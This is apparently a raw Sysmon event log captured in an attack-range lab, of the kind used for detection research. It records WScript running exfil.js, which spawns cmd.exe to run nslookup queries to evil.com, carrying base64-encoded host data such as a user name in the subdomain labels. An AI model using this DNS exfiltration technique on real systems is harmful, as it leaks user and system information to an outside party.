14:21:50.990{00000000-0000-0000-0000-000000000000}3656evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.900{00000000-0000-0000-0000-000000000000}5088evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000215861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.937{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-7646-000000005F02}7664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000215860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.797{00000000-0000-0000-0000-000000000000}8156evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.712{00000000-0000-0000-0000-000000000000}7540evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.635{00000000-0000-0000-0000-000000000000}6000evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.559{00000000-0000-0000-0000-000000000000}7944evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.461{00000000-0000-0000-0000-000000000000}7280evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000215855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.921{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.921{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.921{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.921{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.921{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-7546-000000005F02}6172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.921{2E1864BB-18E0-629A-6742-000000005F02}39765824C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-7546-000000005F02}6172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000215849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.368{00000000-0000-0000-0000-000000000000}6208evil.com0::ffff:127.0.0.1;<unknown process> 154100x8000000000000000215848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.934{2E1864BB-18FF-629A-7546-000000005F02}6172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlracod.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000215847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.274{00000000-0000-0000-0000-000000000000}1848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.192{00000000-0000-0000-0000-000000000000}7780evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.094{00000000-0000-0000-0000-000000000000}7904evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.960{00000000-0000-0000-0000-000000000000}3972evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.861{00000000-0000-0000-0000-000000000000}660evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000215842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.921{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpshkx.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.905{2E1864BB-18FF-629A-7346-000000005F02}72727204C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-7446-000000005F02}1240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.903{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-7446-000000005F02}1240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.903{2E1864BB-18FF-629A-7246-000000005F02}49365488C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-7446-000000005F02}1240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.903{2E1864BB-18FF-629A-7446-000000005F02}1240C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-7246-000000005F02}4936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpshkx.tmp 2>&1 10341000x8000000000000000215833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-7346-000000005F02}7272C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-7346-000000005F02}7272C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{2E1864BB-18FF-629A-7346-000000005F02}72727204C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-7246-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.868{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-7346-000000005F02}7272C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.868{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-7246-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.868{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.868{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.868{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.868{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.852{2E1864BB-18E0-629A-6742-000000005F02}39768128C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-7246-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.868{2E1864BB-18FF-629A-7246-000000005F02}4936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpshkx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 